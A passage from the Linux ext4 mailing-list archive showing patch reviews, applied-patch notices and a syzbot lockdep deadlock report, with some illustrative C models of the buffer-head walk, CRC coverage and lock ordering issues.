uptodate on entry, similar to your block_commit_write() suggestion:
+	bool folio_uptodate = folio_test_uptodate(folio);
+
 	for (bh = head, block_start = 0;
-	     bh != head || !block_start;
+	     (bh != head || !block_start) &&
+	     (!folio_uptodate || block_start < to);
 	     block++, block_start = block_end, bh = bh->b_this_page) {
 		...
 	}
So the prefix path and all in-range handling stay unchanged. The only
skipped work is the tail part after @to, and only for a folio that was
already uptodate before write_begin() started.
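To make the effect of the extra loop condition concrete, here is a small user-space model of the walk. It is only a sketch: struct demo_bh, demo_walk() and DEMO_MAX_BH are made-up names, the ring is a plain array rather than real buffer heads, and the 2 MiB folio with 4 KiB blocks used in the note below is an assumed configuration, not something taken from the benchmark.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct buffer_head: only the ring link matters. */
struct demo_bh {
	struct demo_bh *b_this_page;
};

#define DEMO_MAX_BH 1024

/*
 * Count how many ring entries the loop visits for a write ending at byte
 * offset `to` in a folio made of `nr` blocks of `blocksize` bytes each.
 */
size_t demo_walk(size_t nr, size_t blocksize, size_t to, bool folio_uptodate)
{
	static struct demo_bh ring[DEMO_MAX_BH];
	struct demo_bh *head = &ring[0], *bh;
	size_t block_start, block_end = 0, visited = 0;
	size_t i;

	if (nr == 0 || nr > DEMO_MAX_BH)
		return 0;

	/* Build the circular list, as b_this_page does for a folio. */
	for (i = 0; i < nr; i++)
		ring[i].b_this_page = &ring[(i + 1) % nr];

	/* Same termination condition as the proposed v2 loop. */
	for (bh = head, block_start = 0;
	     (bh != head || !block_start) &&
	     (!folio_uptodate || block_start < to);
	     block_start = block_end, bh = bh->b_this_page) {
		block_end = block_start + blocksize;
		visited++;
	}
	return visited;
}
```

Under those assumptions a folio has 512 blocks. For a 1 KiB overwrite at offset 0, demo_walk(512, 4096, 1024, true) visits 1 entry, while demo_walk(512, 4096, 1024, false) still visits all 512.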
> ... converting ext4 to use iomap instead of buffer heads.
I strongly agree that iomap is the right direction for ext4. The iomap
buffered write path would make this particular buffer-head walk cost go
away.
The reason I am still looking at this path is that the regression is
visible in our LTS upgrade testing from 6.12 to 6.18. It was introduced
by the ext4 large-folio enablement in v6.16. For example, in our
libMicro release benchmark with THP always enabled, usecs/call, lower is
better:
case          v6.12    v6.18    regression
write_u1k     0.609    4.659    +665.0%
write_u10k    1.408    4.869    +245.8%
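For reference, the regression column is the relative increase in usecs/call. A minimal sketch of that arithmetic, with demo_regression_pct() being a hypothetical helper name:

```c
/* Relative slowdown in percent; positive means `after` is slower. */
double demo_regression_pct(double before, double after)
{
	return (after - before) / before * 100.0;
}
```

Feeding it the two rows above, (0.609, 4.659) and (1.408, 4.869), gives values that round to the +665.0% and +245.8% shown in the table.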
The iomap conversion is the long-term fix, but it does not help kernels
which still use the buffer-head buffered write path. I would like to keep
this as a small regression fix for that path, and make it minimal enough
to be suitable for stable/LTS backport.
Would this v2 direction look OK to you?
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: David Laight @ 2026-06-05 8:33 UTC (permalink / raw)
To: Theodore Tso
Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>
On Thu, 4 Jun 2026 10:05:52 -0400
"Theodore Tso" <tytso@mit.edu> wrote:
...
> I suppose we could do it with kmalloc() with some flags to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc(). Is there a better way?
There is already kvalloc().
I'm not sure how hard that tries to get kmalloc() to succeed.
-- David
>
> Thanks,
>
> - Ted
>
* Re: [PATCH RFC 10/17] ext4: use fast incremental CRC update in ext4_free_inode()
From: Baokun Li @ 2026-06-05 7:55 UTC (permalink / raw)
To: Theodore Tso; +Cc: linux-ext4, sashiko
In-Reply-To: <h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit>
On 2026/6/3 22:17, Theodore Tso wrote:
> On Fri, May 08, 2026 at 11:33:05PM +0000, sashiko-bot@kernel.org wrote:
>> Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
>> - [High] ext4_inode_bitmap_csum_set_fast() corrupts the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not a multiple of 8.
>>
>>> - ext4_inode_bitmap_csum_set(sb, gdp, bitmap_bh);
>>> + ext4_inode_bitmap_csum_set_fast(sb, gdp, bit);
>> Can this corrupt the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not
>> a multiple of 8?
>>
>> In ext4_inode_bitmap_csum_set(), the CRC32c checksum is computed over exactly
>> EXT4_INODES_PER_GROUP(sb) >> 3 bytes. If s_inodes_per_group is not a multiple
>> of 8, any trailing fractional bits are strictly excluded from the checksum
>> calculation.
>>
>> Because ext4_fill_super() does not enforce that s_inodes_per_group is a
>> multiple of 8, a crafted filesystem can have an unaligned s_inodes_per_group.
> The reason why ext4_fill_super() doesn't enforce that
> s_inodes_per_group is a multiple of 8 was that a long time ago, back
> when Android was allergic to GPLv2 in userspace, they implemented
> their own version of mke2fs (and didn't run fsck on the file system,
> sigh). Their MIT licensed version of make_ext4fs would occasionally
> make file systems that were not a multiple of 8, and this ran afoul of
> e2fsck[1] if someone actually tried to repair a corrupted Android user
> data file system (as opposed to just wiping the flash and starting
> from scratch).
>
> [1] https://sourceforge.net/p/e2fsprogs/bugs/292/
>
> This was fixed long ago (over a decade ago), and so at this point, I'm
> pretty sure any such mobile handsets are in the landfill, so we
> probably should fix this by adding a check in ext4_fill_super() and a
> corresponding check in e2fsck.
>
> - Ted
Hi Ted,
Thank you for your information and suggestions.
I will send two fix patches to synchronize the checks in mke2fs
with ext4_fill_super and e2fsck.
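As a rough illustration of the issue raised in the review, the following user-space sketch shows which bitmap bits fall outside a checksum computed over inodes_per_group >> 3 bytes. All demo_* names are hypothetical, and demo_ipg_is_valid() is only my guess at the shape of the check, not the actual patch.

```c
#include <stdbool.h>

/* Number of bitmap bytes a ">> 3" sized checksum covers. */
unsigned int demo_csum_bytes(unsigned int inodes_per_group)
{
	return inodes_per_group >> 3;
}

/* Trailing bits that fall outside the checksummed bytes. */
unsigned int demo_uncovered_bits(unsigned int inodes_per_group)
{
	return inodes_per_group & 7;
}

/* True when the byte holding `bit` is inside the checksummed range. */
bool demo_bit_is_covered(unsigned int inodes_per_group, unsigned int bit)
{
	return (bit >> 3) < demo_csum_bytes(inodes_per_group);
}

/* The kind of sanity check discussed in the thread: multiple of 8. */
bool demo_ipg_is_valid(unsigned int inodes_per_group)
{
	return inodes_per_group != 0 && (inodes_per_group & 7) == 0;
}
```

With 8190 inodes per group, for example, only 1023 bytes are checksummed and the last 6 bits sit in a byte the checksum never sees, so an incremental update keyed on one of those bits has nothing valid to update.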
Thanks,
Baokun
* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-05 7:02 UTC (permalink / raw)
To: Darrick J. Wong
Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
ojaswin
In-Reply-To: <20260604145434.GG6095@frogsfrogsfrogs>
On 04/06/26 8:24 pm, Darrick J. Wong wrote:
> On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
>> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
>> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
>> on DAX files.
>>
>> Add an ext4-specific check in _require_defrag() to skip tests when DAX
>> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
>> generic/018.
>>
>> XFS defrag works with DAX, so this check is ext4-specific.
>>
>> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
>> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
>> ---
>> Changes in v2:
>> - Made the check ext4-specific as XFS defrag works with DAX
>> (feedback from Darrick)
>> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
>> - Removed unnecessary comment as _notrun message is self-explanatory
>>
>> common/defrag | 4 ++++
>> 1 file changed, 4 insertions(+)
>>
>> diff --git a/common/defrag b/common/defrag
>> index 055d0d0e..f17271cd 100644
>> --- a/common/defrag
>> +++ b/common/defrag
>> @@ -6,6 +6,10 @@
>>
>> _require_defrag()
>> {
>> + if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
>
> Shouldn't this be:
>
> ext4)
> __scratch_uses_fsdax && _notrun "..."
> ;;
>
> in the case statement below?
>
> --D
Yes, that makes more sense. Keeping the ext4-specific check inside the
ext4 case is cleaner and more consistent with the existing structure.
I'll send v3 with this change.
>
>> + _notrun "ext4 online defrag not supported with DAX"
>> + fi
>> +
>> case "$FSTYP" in
>> xfs)
>> # xfs_fsr does preallocates, require "falloc"
>> --
>> 2.45.1
>>
--
Regards,
Disha
* [syzbot] [overlayfs?] [ext4?] possible deadlock in lock_two_nondirectories (2)
From: syzbot @ 2026-06-04 21:33 UTC (permalink / raw)
To: amir73il, linux-ext4, linux-kernel, linux-unionfs, miklos,
syzkaller-bugs
Hello,
syzbot found the following issue on:
HEAD commit: ba3e43a9e601 Merge tag 'soc-fixes-7.1-2' of git://git.kern..
git tree: upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=1033aa56580000
kernel config: https://syzkaller.appspot.com/x/.config?x=bd38685893011045
dashboard link: https://syzkaller.appspot.com/bug?extid=ad6118a7584b607c67f2
compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
syz repro: https://syzkaller.appspot.com/x/repro.syz?x=17e2f3ec580000
C reproducer: https://syzkaller.appspot.com/x/repro.c?x=174c2a66580000
Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/8759ddf1bfa7/disk-ba3e43a9.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/e2f0e563c705/vmlinux-ba3e43a9.xz
kernel image: https://storage.googleapis.com/syzbot-assets/b40bdb37a0d7/bzImage-ba3e43a9.xz
mounted in repro: https://storage.googleapis.com/syzbot-assets/4074e1f6d9f8/mount_0.gz
fsck result: failed (log: https://syzkaller.appspot.com/x/fsck.log?x=1103db7e580000)
IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+ad6118a7584b607c67f2@syzkaller.appspotmail.com
EXT4-fs: Ignoring removed bh option
EXT4-fs (loop0): stripe (5) is not aligned with cluster size (16), stripe is disabled
EXT4-fs (loop0): mounted filesystem 00000000-0000-0000-0000-000000000000 r/w without journal. Quota mode: none.
======================================================
WARNING: possible circular locking dependency detected
syzkaller #0 Not tainted
------------------------------------------------------
syz.0.22/5968 is trying to acquire lock:
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: inode_lock include/linux/fs.h:1029 [inline]
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
but task is already holding lock:
ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537
which lock already depends on the new lock.
the existing dependency chain (in reverse order) is:
-> #1 (sb_writers#4){.+.+}-{0:0}:
percpu_down_read_internal include/linux/percpu-rwsem.h:53 [inline]
percpu_down_read_freezable include/linux/percpu-rwsem.h:83 [inline]
__sb_start_write include/linux/fs/super.h:19 [inline]
sb_start_write+0x4d/0x1c0 include/linux/fs/super.h:125
file_start_write include/linux/fs.h:2724 [inline]
vfs_iter_write+0x1f8/0x610 fs/read_write.c:982
do_backing_file_write_iter fs/backing-file.c:226 [inline]
backing_file_write_iter+0x5e7/0x950 fs/backing-file.c:274
ovl_write_iter+0x2fd/0x3d0 fs/overlayfs/file.c:370
new_sync_write fs/read_write.c:595 [inline]
vfs_write+0x629/0xba0 fs/read_write.c:688
ksys_pwrite64 fs/read_write.c:795 [inline]
__do_sys_pwrite64 fs/read_write.c:803 [inline]
__se_sys_pwrite64 fs/read_write.c:800 [inline]
__x64_sys_pwrite64+0x19c/0x230 fs/read_write.c:800
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
-> #0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}:
check_prev_add kernel/locking/lockdep.c:3165 [inline]
check_prevs_add kernel/locking/lockdep.c:3284 [inline]
validate_chain kernel/locking/lockdep.c:3908 [inline]
__lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
inode_lock include/linux/fs.h:1029 [inline]
lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
__ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:597 [inline]
__se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
other info that might help us debug this:
Possible unsafe locking scenario:
       CPU0                    CPU1
       ----                    ----
  rlock(sb_writers#4);
                               lock(&ovl_i_mutex_key[depth]);
                               lock(sb_writers#4);
  lock(&ovl_i_mutex_key[depth]);
*** DEADLOCK ***
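The shape of this report, an existing dependency in one direction plus a new acquisition in the other, can be sketched with a tiny dependency graph. This is an illustrative user-space model only, not how lockdep is implemented; the demo_* names and the two-class enum are assumptions, and the reading that chain #1 records sb_writers being taken under the overlayfs inode lock is inferred from the trace above.

```c
#include <stdbool.h>
#include <string.h>

#define DEMO_NR_CLASSES 4

/* Hypothetical lock classes standing in for the two in the report. */
enum demo_class { DEMO_OVL_I_MUTEX, DEMO_SB_WRITERS };

/* dep[a][b] is true when class b has been taken while holding a. */
static bool dep[DEMO_NR_CLASSES][DEMO_NR_CLASSES];

/* Forget every recorded dependency. */
void demo_reset(void)
{
	memset(dep, 0, sizeof(dep));
}

/* Depth-first search: can `to` be reached from `from` via recorded edges? */
static bool demo_reachable(int from, int to, bool *seen)
{
	int next;

	if (from == to)
		return true;
	seen[from] = true;
	for (next = 0; next < DEMO_NR_CLASSES; next++)
		if (dep[from][next] && !seen[next] &&
		    demo_reachable(next, to, seen))
			return true;
	return false;
}

/*
 * Record "acquired while held". Returns false, and records nothing,
 * when the new edge would close a cycle.
 */
bool demo_add_dep(int held, int acquired)
{
	bool seen[DEMO_NR_CLASSES] = { false };

	if (demo_reachable(acquired, held, seen))
		return false;
	dep[held][acquired] = true;
	return true;
}
```

In this model, recording demo_add_dep(DEMO_OVL_I_MUTEX, DEMO_SB_WRITERS) succeeds, and the later demo_add_dep(DEMO_SB_WRITERS, DEMO_OVL_I_MUTEX) is rejected because it would close the cycle.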
1 lock held by syz.0.22/5968:
#0: ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537
stack backtrace:
CPU: 0 UID: 0 PID: 5968 Comm: syz.0.22 Not tainted syzkaller #0 PREEMPT_{RT,(full)}
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/18/2026
Call Trace:
<TASK>
dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
print_circular_bug+0x2e1/0x300 kernel/locking/lockdep.c:2043
check_noncircular+0x12e/0x150 kernel/locking/lockdep.c:2175
check_prev_add kernel/locking/lockdep.c:3165 [inline]
check_prevs_add kernel/locking/lockdep.c:3284 [inline]
validate_chain kernel/locking/lockdep.c:3908 [inline]
__lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
inode_lock include/linux/fs.h:1029 [inline]
lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
__ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:597 [inline]
__se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7fb592a3ce59
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffc3443e838 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 00007fb592cb5fa0 RCX: 00007fb592a3ce59
RDX: 0000200000000040 RSI: 00000000c028660f RDI: 0000000000000005
RBP: 00007fb592ad2d6f R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007fb592cb5fac R14: 00007fb592cb5fa0 R15: 00007fb592cb5fa0
</TASK>
---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.
syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.
If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title
If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.
If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)
If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report
If you want to undo deduplication, reply with:
#syz undup
* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Darrick J. Wong @ 2026-06-04 14:54 UTC (permalink / raw)
To: Disha Goel
Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
ojaswin
In-Reply-To: <20260604122305.39805-1-disgoel@linux.ibm.com>
On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
> on DAX files.
>
> Add an ext4-specific check in _require_defrag() to skip tests when DAX
> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
> generic/018.
>
> XFS defrag works with DAX, so this check is ext4-specific.
>
> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
> ---
> Changes in v2:
> - Made the check ext4-specific as XFS defrag works with DAX
> (feedback from Darrick)
> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
> - Removed unnecessary comment as _notrun message is self-explanatory
>
> common/defrag | 4 ++++
> 1 file changed, 4 insertions(+)
>
> diff --git a/common/defrag b/common/defrag
> index 055d0d0e..f17271cd 100644
> --- a/common/defrag
> +++ b/common/defrag
> @@ -6,6 +6,10 @@
>
> _require_defrag()
> {
> + if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
Shouldn't this be:
ext4)
__scratch_uses_fsdax && _notrun "..."
;;
in the case statement below?
--D
> + _notrun "ext4 online defrag not supported with DAX"
> + fi
> +
> case "$FSTYP" in
> xfs)
> # xfs_fsr does preallocates, require "falloc"
> --
> 2.45.1
>
* Re: [RFC v8 0/7] ext4: fast commit: snapshot inode state for FC log
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Zhang Yi, Andreas Dilger, Li Chen
Cc: Theodore Ts'o, Steven Rostedt, Masami Hiramatsu,
Mathieu Desnoyers, linux-ext4, linux-trace-kernel, linux-kernel
In-Reply-To: <20260515091829.194810-1-me@linux.beauty>
On Fri, 15 May 2026 17:18:20 +0800, Li Chen wrote:
> (This RFC v8 series is rebased onto linux-next master as of 2026-05-09,
> commit e98d21c170b0 ("Add linux-next specific files for 20260508"), and
> depends on patch "ext4: fix fast commit wait/wake bit mapping on
> 64-bit" [0]).
>
> Zhang Yi in RFC v3 review pointed out that postponing lockdep assertions only
> masks the issue, and that sleeping in ext4_fc_track_inode() while holding
> i_data_sem can form a real ABBA deadlock if the fast commit writer also needs
> i_data_sem while the inode is in FC_COMMITTING.
>
> [...]
Applied, thanks!
[1/7] ext4: fast commit: snapshot inode state before writing log
commit: e9c6e0b8e096255feb71ec996c77bdfbe9c36e91
[2/7] ext4: lockdep: handle i_data_sem subclassing for special inodes
commit: 7f473f971382d73a58e386afa7efdaac294b89f0
[3/7] ext4: fast commit: avoid waiting for FC_COMMITTING
commit: b3060e96533dc3157fc6d3d45dc19927c566977b
[4/7] ext4: fast commit: avoid self-deadlock in inode snapshotting
commit: 2b9b216628fd9352f9c791701c8990d05736aa90
[5/7] ext4: fast commit: avoid i_data_sem by dropping ext4_map_blocks() in snapshots
commit: 22d887e06a57261df58404c8dce50c4ef37549ed
[6/7] ext4: fast commit: add lock_updates tracepoint
commit: d2f6e83bbbef31169ea363af4277f5c09c914eda
[7/7] ext4: fast commit: export snapshot stats in fc_info
commit: 56bb0b64f4b198bad5ce674509c10793d471148f
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
* Re: [PATCH] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: linux-ext4, Zhang Yi
Cc: Theodore Ts'o, linux-fsdevel, linux-kernel, adilger.kernel,
libaokun, jack, ojaswin, ritesh.list, yi.zhang, yizhang089,
yangerkun, yukuai
In-Reply-To: <20260424104201.1930823-1-yi.zhang@huaweicloud.com>
On Fri, 24 Apr 2026 18:42:01 +0800, Zhang Yi wrote:
> In EXT4_GOING_FLAGS_LOGFLUSH mode, the EXT4_FLAGS_SHUTDOWN flag was set
> before calling ext4_force_commit(). This caused ordered-mode data
> writeback (triggered by journal commit) to fail with -EIO, since
> ext4_do_writepages() checks for the shutdown flag. The journal would
> then be aborted prematurely before the commit could succeed.
>
> Fix this by calling ext4_force_commit() first, then setting the
> shutdown flag, so that pending data can be written back correctly.
>
> [...]
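The ordering problem described in the commit message can be shown with a toy user-space model. This is only a sketch: struct demo_fs and the demo_* functions are hypothetical stand-ins, and the real ext4 and jbd2 paths involve far more state than a single flag.

```c
#include <errno.h>
#include <stdbool.h>

/* Hypothetical, heavily simplified filesystem state. */
struct demo_fs {
	bool shutdown;		/* models EXT4_FLAGS_SHUTDOWN */
	bool data_written;	/* ordered-mode data reached the disk */
};

/* Models ordered-mode writeback: refuses to run once shutdown is set. */
static int demo_writeback(struct demo_fs *fs)
{
	if (fs->shutdown)
		return -EIO;
	fs->data_written = true;
	return 0;
}

/* Models a journal commit that must write ordered data first. */
static int demo_force_commit(struct demo_fs *fs)
{
	return demo_writeback(fs);
}

/* Old ordering: set the flag first, then commit. */
int demo_logflush_old(struct demo_fs *fs)
{
	fs->shutdown = true;
	return demo_force_commit(fs);
}

/* Ordering described in the patch: commit first, then set the flag. */
int demo_logflush_new(struct demo_fs *fs)
{
	int err = demo_force_commit(fs);

	fs->shutdown = true;
	return err;
}
```

In the model, demo_logflush_old() returns -EIO with the data never written, while demo_logflush_new() returns 0 and still ends with the shutdown flag set.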
Applied, thanks!
[1/1] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
commit: d99748ef1695ce17eaf51c64b7a06952fa7cddab
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-04 14:46 UTC (permalink / raw)
To: Theodore Tso
Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>
I'm hoping you'll take my "Remove special jbd2 slabs" patch instead of
this one, but answering here anyway ...
On Thu, Jun 04, 2026 at 10:05:52AM -0400, Theodore Tso wrote:
> On Thu, Jun 04, 2026 at 09:14:57AM +0300, Mike Rapoport wrote:
> > There's no memory overhead when order == 1.
> > As for the CPU overhead, the difference for the fast path allocations is
> > not measurable and for the slow path it is anyway determined by the amount
> > of reclaim involved rather than by what allocator is used.
>
> Thanks for confirming!
>
> > Larger allocations (> PAGE_SIZE * 2) go straight to the page allocator.
That is a detail subject to change. I have some ideas ...
What users are guaranteed is that kmalloc() returns physically contiguous
memory, and that a power-of-two-sized allocation is naturally aligned.
> Another question: Today, we can either use kmalloc() (or
> __get_free_pages, previously) or vmalloc(). Is there a way a file
> system can say, "give me physically contiguous pages if possible, but
> if it's too hard --- with some TBD to specify what 'too hard' means or
> can be specified --- fall back to a vmalloc-style approach, with the
> page table / TLB overhead that this might imply"?
>
> I suppose we could do it with kmalloc() with some flags to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc(). Is there a better way?
I think we'd like to avoid doing that. A lot of code has various
workarounds for deficiencies in the memory allocator (some of which have
been fixed and thus the workarounds only complicate matters). If the
memory allocator(s) aren't providing what you need (be it performance
under load, fragmentation avoidance or whatever), it's best to get that
fixed rather than having fallback paths.
There have been people who have suggested "What if folios could be
physically discontiguous", and sometimes I've humoured them, but the
simplifications enabled by requiring folios to be contiguous are quite
immense.
We've been trying to move in the direction of exposing more high-level
APIs so people can say "I want to allocate 10MB of memory but it doesn't
need to be contiguous" and have the allocator either fail the whole
thing up front or make efforts to ensure that you get the whole 10MB.
It's a lot more efficient than calling get_free_page() 2500 times
and possibly having reclaim run a dozen different times.
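For reference, the "2500 times" figure is roughly the page count for a
10MB request. A minimal sketch of that arithmetic, assuming 4 KiB pages;
pages_needed() is a made-up helper for illustration, not a kernel function:

```c
#include <stddef.h>

/*
 * Hypothetical helper: number of pages needed to cover `bytes`,
 * rounding up. page_size must be nonzero.
 */
static size_t pages_needed(size_t bytes, size_t page_size)
{
	return (bytes + page_size - 1) / page_size;
}
```

With 4096-byte pages, pages_needed(10 * 1024 * 1024, 4096) gives 2560 and
pages_needed(10000000, 4096) gives 2442, so either reading of "10MB" lands
near 2500 single-page allocations.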
(anyone else try to create a brd that's actually larger than system ram?
;-)
^ permalink raw reply
* Re: [PATCH v6 0/2] ext4: add hash Kunit tests and optimize str2hashbuf
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Andreas Dilger, Baokun Li, Jan Kara, Ojaswin Mujoo,
Ritesh Harjani, Zhang Yi, Guan-Chun Wu
Cc: Theodore Ts'o, linux-ext4, linux-kernel, edward062254,
visitorckw, david.laight.linux
In-Reply-To: <20260531080019.3794809-1-409411716@gms.tku.edu.tw>
On Sun, 31 May 2026 16:00:17 +0800, Guan-Chun Wu wrote:
> This series adds Kunit tests for fs/ext4/hash.c and refactors
> the str2hashbuf_{signed,unsigned}() helpers.
>
> Patch 1 adds test coverage for ext4fs_dirhash(), including the main
> hash variants and relevant edge cases.
>
> Patch 2 simplifies the str2hashbuf helper implementation by processing
> input in 4-byte chunks and removing function-pointer dispatch. This also
> reduces overhead and shows roughly 2x improvement on longer inputs in
> local testing.
>
> [...]
Applied, thanks!
[1/2] ext4: add Kunit coverage for directory hash computation
commit: 3147cac6c1929f26b4687993b8c7af5b7b34496d
[2/2] ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers
commit: 3ca1d19c1971ac4f25478eafb741e726bf2d5954
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH] ext4: fix fast commit wait/wake bit mapping on 64-bit
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Li Chen
Cc: Theodore Ts'o, Andreas Dilger, Baokun Li, Jan Kara,
Ojaswin Mujoo, Ritesh Harjani, Zhang Yi, linux-ext4, linux-kernel,
Sashiko AI review
In-Reply-To: <20260513085818.552432-1-me@linux.beauty>
On Wed, 13 May 2026 16:58:17 +0800, Li Chen wrote:
> On 64-bit, ext4 dynamic inode states live in the upper half of i_flags,
> and ext4_test_inode_state() applies the corresponding +32 offset.
>
> The fast-commit wait and wake paths open-coded the wait key with the raw
> EXT4_STATE_* value. Add small helpers for the state wait word and bit,
